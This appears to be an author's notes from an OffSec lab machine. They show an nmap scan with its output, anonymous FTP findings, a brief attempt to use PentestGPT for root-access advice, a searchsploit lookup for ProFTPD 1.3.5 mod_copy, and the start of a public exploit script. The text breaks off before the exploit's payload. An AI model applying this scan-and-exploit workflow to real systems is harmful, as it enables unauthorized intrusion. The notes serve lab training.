Offsec - FunboxRookie - May 13th 2023
Target is: [LAB_IP]
nmap --top-ports 100 -sV [LAB_IP] -sC
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-13 04:19 EDT
Nmap scan report for [LAB_IP]
Host is up (0.046s latency).
Not shown: 97 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
| -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
| -r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
| -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
|_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 [HASH_REDACTED] (RSA)
| 256 [HASH_REDACTED] (ECDSA)
|_ 256 [HASH_REDACTED] (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry
|_/logs/
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.27 seconds
Check out the FTP files and also the disallowed entry. Will try PentestGPT's suggestions as well. (Configures PentestGPT locally really quick)
PentestGPT consultation
python3 main.py --reasoning_model=gpt-4 --useAPI
target is [LAB_IP]. Goal is to get root access. No auto exploit frameworks
What next? Also don't suggest auto exploit frameworks.
And it broke lol
Anyhow looking first at FTP anon I'll check out what's there
Dumped the FTP contents and the welcome message says it's an experimental FTP server.
Attempt to unzip files asks for an id_rsa password
Will go back to this for cracking...
Checking for a service version vuln
Found exploit for the ProFTPd version
→ searchsploit ProFTPD 1.3.5
Exploit Title | Path
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
Shellcodes: No Results
Papers: No Results
cat /usr/share/exploitdb/exploits/linux/remote/36803.py
Title: ProFTPd 1.3.5 Remote Command Execution
Date : 20/04/2015
Author: R-73eN
Software: ProFTPd 1.3.5 with mod_copy
Tested : Kali Linux 1.06
CVE : 2015-3306
Greetz to Vadim Melihow for all the hard work .
import socket
import sys
import requests
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ | __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ | |_ / _ | | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | | () | || | / | | | / ___ | | \n"
banner +=" |_|| |_|| _/ _|___|| || // ______|\n\n"
print banner
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)